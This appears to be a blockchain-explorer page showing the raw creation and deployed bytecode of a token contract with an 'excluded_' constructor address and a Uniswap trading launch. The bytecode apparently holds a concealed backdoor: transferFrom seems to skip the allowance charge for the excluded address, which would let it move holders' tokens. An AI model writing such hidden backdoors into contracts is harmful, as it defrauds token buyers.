5b61069c565b6040516102f19190611071565b60405180910390f35b348015610305575f5ffd5b50610320600480360381019061031b919061110e565b61071e565b005b61032a6107a0565b60055f9054906101000a900460ff1615610379576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610370906111e9565b60405180910390fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d90506103bc30827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff61081e565b8073ffffffffffffffffffffffffffffffffffffffff1663f305d71947306103e33061056a565b5f5f6103ed6105c3565b426040518863ffffffff1660e01b815260040161040f96959493929190611249565b60606040518083038185885af115801561042b573d5f5f3e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061045091906112bc565b505050600160055f6101000a81548160ff02191690831515021790555050565b60606006805461047f90611339565b80601f01602080910402602001604051908101604052809291908181526020018280546104ab90611339565b80156104f65780601f106104cd576101008083540402835291602001916104f6565b820191905f5260205f20905b8154815290600101906020018083116104d957829003601f168201915b5050505050905090565b5f5f61050a610830565b905061051781858561081e565b600191505092915050565b5f600354905090565b5f5f610535610830565b905061054b85826105468487610837565b6108a1565b610556858585610934565b60019150509392505050565b5f6009905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105b86107a0565b6105c15f610a24565b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546105f990611339565b80601f016020809104026020016040519081016040528092919081815260200182805461062590611339565b80156106705780601f1061064757610100808354040283529160200191610670565b820191905f5260205f20905b81548152906001019060200180831161065357829003601f168201915b5050505050905090565b5f5f610684610830565b9050610691818585610934565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107266107a0565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610794576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161078b906113d9565b60405180910390fd5b61079d81610a24565b50565b6107a8610830565b73ffffffffffffffffffffffffffffffffffffffff166107c66105c3565b73ffffffffffffffffffffffffffffffffffffffff161461081c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081390611441565b60405180910390fd5b565b61082b8383836001610ae5565b505050565b5f33905090565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661088c5781610899565b5f82610898919061148c565b5b905092915050565b5f6108ac848461069c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81101561092e578181101561091f578281836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610916939291906114cd565b60405180910390fd5b61092d84848484035f610ae5565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109a4575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161099b9190611148565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a14575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610a0b9190611148565b60405180910390fd5b610a1f838383610cb4565b505050565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610b55575f6040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610b4c9190611148565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bc5575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610bbc9190611148565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610cae578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ca59190611071565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d04578060035f828254610cf89190611502565b92505081905550610dd4565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610d8e578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610d85939291906114cd565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e1b578060035f8282540392505081905550610e66565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610ec39190611071565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610f1282610ed0565b610f1c8185610eda565b9350610f2c818560208601610eea565b610f3581610ef8565b840191505092915050565b5f6020820190508181035f830152610f588184610f08565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f8d82610f64565b9050919050565b610f9d81610f83565b8114610fa7575f5ffd5b50565b5f81359050610fb881610f94565b92915050565b5f819050919050565b610fd081610fbe565b8114610fda575f5ffd5b50565b5f81359050610feb81610fc7565b92915050565b5f5f6040838503121561100757611006610f60565b5b5f61101485828601610faa565b925050602061102585828601610fdd565b9150509250929050565b5f8115159050919050565b6110438161102f565b82525050565b5f60208201905061105c5f83018461103a565b92915050565b61106b81610fbe565b82525050565b5f6020820190506110845f830184611062565b92915050565b5f5f5f606084860312156110a1576110a0610f60565b5b5f6110ae86828701610faa565b93505060206110bf86828701610faa565b92505060406110d086828701610fdd565b9150509250925092565b5f60ff82169050919050565b6110ef816110da565b82525050565b5f6020820190506111085f8301846110e6565b92915050565b5f6020828403121561112357611122610f60565b5b5f61113084828501610faa565b91505092915050565b61114281610f83565b82525050565b5f60208201905061115b5f830184611139565b92915050565b5f5f6040838503121561117757611176610f60565b5b5f61118485828601610faa565b925050602061119585828601610faa565b9150509250929050565b7f54726164696e6720697320616c7265616479206f70656e65642e0000000000005f82015250565b5f6111d3601a83610eda565b91506111de8261119f565b602082019050919050565b5f6020820190508181035f830152611200816111c7565b9050919050565b5f819050919050565b5f819050919050565b5f61123361122e61122984611207565b611210565b610fbe565b9050919050565b61124381611219565b82525050565b5f60c08201905061125c5f830189611139565b6112696020830188611062565b611276604083018761123a565b611283606083018661123a565b6112906080830185611139565b61129d60a0830184611062565b979650505050505050565b5f815190506112b681610fc7565b92915050565b5f5f5f606084860312156112d3576112d2610f60565b5b5f6112e0868287016112a8565b93505060206112f1868287016112a8565b9250506040611302868287016112a8565b9150509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061135057607f821691505b6020821081036113635761136261130c565b5b50919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6113c3602683610eda565b91506113ce82611369565b604082019050919050565b5f6020820190508181035f8301526113f0816113b7565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61142b602083610eda565b9150611436826113f7565b602082019050919050565b5f6020820190508181035f8301526114588161141f565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61149682610fbe565b91506114a183610fbe565b92508282026114af81610fbe565b915082820484148315176114c6576114c561145f565b5b5092915050565b5f6060820190506114e05f830186611139565b6114ed6020830185611062565b6114fa6040830184611062565b949350505050565b5f61150c82610fbe565b915061151783610fbe565b925082820190508082111561152f5761152e61145f565b5b9291505056fea2646970667358221220c488cd71256f5f02a038f9379af1f2b015d8e42e1a06c14b24fce8a7b0f83ca664736f6c634300081e0033000000000000000000000000a79da3acb9b293b60e52a8f2141eb7d2d5b9ec6d
Deployed Bytecode
0x6080604052600436106100c5575f3560e01c806370a082311161007e57806395d89b411161005857806395d89b4114610258578063a9059cbb14610282578063dd62ed3e146102be578063f2fde38b146102fa576100cc565b806370a08231146101dc578063715018a6146102185780638da5cb5b1461022e576100cc565b806301339c21146100d057806306fdde03146100e6578063095ea7b31461011057806318160ddd1461014c57806323b872dd14610176578063313ce567146101b2576100cc565b366100cc57005b5f5ffd5b3480156100db575f5ffd5b506100e4610322565b005b3480156100f1575f5ffd5b506100fa610470565b6040516101079190610f40565b60405180910390f35b34801561011b575f5ffd5b5061013660048036038101906101319190610ff1565b610500565b6040516101439190611049565b60405180910390f35b348015610157575f5ffd5b50610160610522565b60405161016d9190611071565b60405180910390f35b348015610181575f5ffd5b5061019c6004803603810190610197919061108a565b61052b565b6040516101a99190611049565b60405180910390f35b3480156101bd575f5ffd5b506101c6610562565b6040516101d391906110f5565b60405180910390f35b3480156101e7575f5ffd5b5061020260048036038101906101fd919061110e565b61056a565b60405161020f9190611071565b60405180910390f35b348015610223575f5ffd5b5061022c6105b0565b005b348015610239575f5ffd5b506102426105c3565b60405161024f9190611148565b60405180910390f35b348015610263575f5ffd5b5061026c6105ea565b6040516102799190610f40565b60405180910390f35b34801561028d575f5ffd5b506102a860048036038101906102a39190610ff1565b61067a565b6040516102b59190611049565b60405180910390f35b3480156102c9575f5ffd5b506102e460048036038101906102df9190611161565b61069c565b6040516102f19190611071565b60405180910390f35b348015610305575f5ffd5b50610320600480360381019061031b919061110e565b61071e565b005b61032a6107a0565b60055f9054906101000a900460ff1615610379576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610370906111e9565b60405180910390fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d90506103bc30827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff61081e565b8073ffffffffffffffffffffffffffffffffffffffff1663f305d71947306103e33061056a565b5f5f6103ed6105c3565b426040518863ffffffff1660e01b815260040161040f96959493929190611249565b60606040518083038185885af115801561042b573d5f5f3e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061045091906112bc565b505050600160055f6101000a81548160ff02191690831515021790555050565b60606006805461047f90611339565b80601f01602080910402602001604051908101604052809291908181526020018280546104ab90611339565b80156104f65780601f106104cd576101008083540402835291602001916104f6565b820191905f5260205f20905b8154815290600101906020018083116104d957829003601f168201915b5050505050905090565b5f5f61050a610830565b905061051781858561081e565b600191505092915050565b5f600354905090565b5f5f610535610830565b905061054b85826105468487610837565b6108a1565b610556858585610934565b60019150509392505050565b5f6009905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105b86107a0565b6105c15f610a24565b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546105f990611339565b80601f016020809104026020016040519081016040528092919081815260200182805461062590611339565b80156106705780601f1061064757610100808354040283529160200191610670565b820191905f5260205f20905b81548152906001019060200180831161065357829003601f168201915b5050505050905090565b5f5f610684610830565b9050610691818585610934565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107266107a0565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610794576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161078b906113d9565b60405180910390fd5b61079d81610a24565b50565b6107a8610830565b73ffffffffffffffffffffffffffffffffffffffff166107c66105c3565b73ffffffffffffffffffffffffffffffffffffffff161461081c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081390611441565b60405180910390fd5b565b61082b8383836001610ae5565b505050565b5f33905090565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661088c5781610899565b5f82610898919061148c565b5b905092915050565b5f6108ac848461069c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81101561092e578181101561091f578281836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610916939291906114cd565b60405180910390fd5b61092d84848484035f610ae5565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109a4575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161099b9190611148565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a14575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610a0b9190611148565b60405180910390fd5b610a1f838383610cb4565b505050565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610b55575f6040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610b4c9190611148565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bc5575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610bbc9190611148565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610cae578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ca59190611071565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d04578060035f828254610cf89190611502565b92505081905550610dd4565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610d8e578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610d85939291906114cd565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e1b578060035f8282540392505081905550610e66565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610ec39190611071565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610f1282610ed0565b610f1c8185610eda565b9350610f2c818560208601610eea565b610f3581610ef8565b840191505092915050565b5f6020820190508181035f830152610f588184610f08565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f8d82610f64565b9050919050565b610f9d81610f83565b8114610fa7575f5ffd5b50565b5f81359050610fb881610f94565b92915050565b5f819050919050565b610fd081610fbe565b8114610fda575f5ffd5b50565b5f81359050610feb81610fc7565b92915050565b5f5f6040838503121561100757611006610f60565b5b5f61101485828601610faa565b925050602061102585828601610fdd565b9150509250929050565b5f8115159050919050565b6110438161102f565b82525050565b5f60208201905061105c5f83018461103a565b92915050565b61106b81610fbe565b82525050565b5f6020820190506110845f830184611062565b92915050565b5f5f5f606084860312156110a1576110a0610f60565b5b5f6110ae86828701610faa565b93505060206110bf86828701610faa565b92505060406110d086828701610fdd565b9150509250925092565b5f60ff82169050919050565b6110ef816110da565b82525050565b5f6020820190506111085f8301846110e6565b92915050565b5f6020828403121561112357611122610f60565b5b5f61113084828501610faa565b91505092915050565b61114281610f83565b82525050565b5f60208201905061115b5f830184611139565b92915050565b5f5f6040838503121561117757611176610f60565b5b5f61118485828601610faa565b925050602061119585828601610faa565b9150509250929050565b7f54726164696e6720697320616c7265616479206f70656e65642e0000000000005f82015250565b5f6111d3601a83610eda565b91506111de8261119f565b602082019050919050565b5f6020820190508181035f830152611200816111c7565b9050919050565b5f819050919050565b5f819050919050565b5f61123361122e61122984611207565b611210565b610fbe565b9050919050565b61124381611219565b82525050565b5f60c08201905061125c5f830189611139565b6112696020830188611062565b611276604083018761123a565b611283606083018661123a565b6112906080830185611139565b61129d60a0830184611062565b979650505050505050565b5f815190506112b681610fc7565b92915050565b5f5f5f606084860312156112d3576112d2610f60565b5b5f6112e0868287016112a8565b93505060206112f1868287016112a8565b9250506040611302868287016112a8565b9150509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061135057607f821691505b6020821081036113635761136261130c565b5b50919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6113c3602683610eda565b91506113ce82611369565b604082019050919050565b5f6020820190508181035f8301526113f0816113b7565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61142b602083610eda565b9150611436826113f7565b602082019050919050565b5f6020820190508181035f8301526114588161141f565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61149682610fbe565b91506114a183610fbe565b92508282026114af81610fbe565b915082820484148315176114c6576114c561145f565b5b5092915050565b5f6060820190506114e05f830186611139565b6114ed6020830185611062565b6114fa6040830184611062565b949350505050565b5f61150c82610fbe565b915061151783610fbe565b925082820190508082111561152f5761152e61145f565b5b9291505056fea2646970667358221220c488cd71256f5f02a038f9379af1f2b015d8e42e1a06c14b24fce8a7b0f83ca664736f6c634300081e0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000a79da3acb9b293b60e52a8f2141eb7d2d5b9ec6d
-----Decoded View---------------
Arg [0] : excluded_ (address): 0xA79dA3acB9b293B60E52A8f2141eb7D2d5B9EC6d
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000a79da3acb9b293b60e52a8f2141eb7d2d5b9ec6d
Loading...
Loading
Loading...
Loading

Multichain Portfolio | 34 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.